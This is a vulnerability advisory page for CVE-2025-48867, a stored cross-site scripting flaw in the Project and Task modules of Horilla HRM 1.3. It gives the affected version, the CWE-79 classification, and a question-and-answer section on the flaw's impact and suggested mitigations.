CVE-2025-48867
BaseFortify
Publication date: 2025-09-24
Last updated on: 2025-09-29
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| horilla | horilla | 1.3 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a stored cross-site scripting (XSS) issue in Horilla HRM 1.3.0. Authenticated admin or privileged users can inject malicious JavaScript code into multiple fields in the Project and Task modules. The injected code is saved in the database and executed when viewed by other admins or privileged users through the web interface.
How can this vulnerability impact me? :
The vulnerability can lead to session hijacking and unauthorized actions within high-privilege accounts. Since the malicious scripts execute in the context of privileged users, attackers can potentially take over admin sessions or perform unauthorized operations, compromising the security of the HRMS.
What immediate steps should I take to mitigate this vulnerability?
Since there is no known patch available at the time of publication, immediate mitigation steps include restricting access to the Project and Task modules to only trusted and necessary privileged users, avoiding the input of untrusted data into these fields, and monitoring for suspicious activity by privileged users. Additionally, educating admin users about the risk of stored XSS and encouraging them to avoid clicking on suspicious links or inputs within the HRM interface can help reduce risk.